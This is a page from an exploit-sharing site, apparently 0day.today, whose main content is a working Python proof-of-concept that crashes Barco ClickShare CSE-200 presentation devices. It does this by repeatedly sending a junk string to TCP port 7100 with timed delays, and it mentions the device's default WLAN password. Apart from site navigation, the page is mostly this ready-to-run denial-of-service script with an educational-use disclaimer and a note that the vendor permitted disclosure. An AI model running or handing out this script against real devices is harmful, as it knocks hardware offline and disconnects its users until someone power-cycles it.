0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Barco ClickShare CSE-200 Denial Of Service Vulnerability
#!/usr/bin/python # Exploit Title: Barco ClickShare CSE-200 - Remote Denial of Service # Date: 11-04-2018 # Hardware Link: https://www.barco.com/de/product/clickshare-cse-200 # Exploit Author: Florian Hauser # Contact: florian DOT g DOT hauser AT gmail DOT com # CVE: requested by Barco # Category: Hardware # Disclaimer: # This or previous programs is for Educational # purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the # fact that Florian Hauser is not liable for any # damages caused by direct or indirect use of the # information or functionality provided by these # programs. The author or any Internet provider # bears NO responsibility for content or misuse # of these programs or any derivatives thereof. # By using these programs you accept the fact # that any damage (dataloss, system crash, # system compromise, etc.) caused by the use # of these programs is not Florian Hauser's # responsibility. # # Use them at your own risk! ################ # Vulnerability description (you have to be connected to the ClickShare WLAN for that, standard password is 'clickshare'): # Sending arbitrary unexpected string to TCP port 7100 with respect to -> a certain time sequence <- # not only disconnects all clients but also results in a crash of this hardware device # Recover: Switch energy supply off for several minutes and reboot the system. Patches will be delivered in July 2018. # I got permission from Barco to disclose this vulnerability. # This affects potentially all other ClickShare products, Barco confirms import socket import sys from time import sleep if len(sys.argv) != 2: print "Usage: exploit.py <ip>" sys.exit(0) # Sending random string until crash occurs. Max. of 50 seems definitely sufficient for that. # 6-7 requests do the job usually for x in range(1,50): #Create a new socket each time because otherwise the service drops the socket #Same request cannot be sent several times in sequence s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Connect to vulnerable TCP port 7100 connect=s.connect((str(sys.argv[1]), 7100)) s.send('some evil string \r\n\n') print "Buffer " + str(x) + " sent...\n" result=s.recv(1024) print result s.close() #Sleep for a few seconds because otherwise the service denies a socket creation but does not crash sleep(7) # 0day.today [2024-06-25] #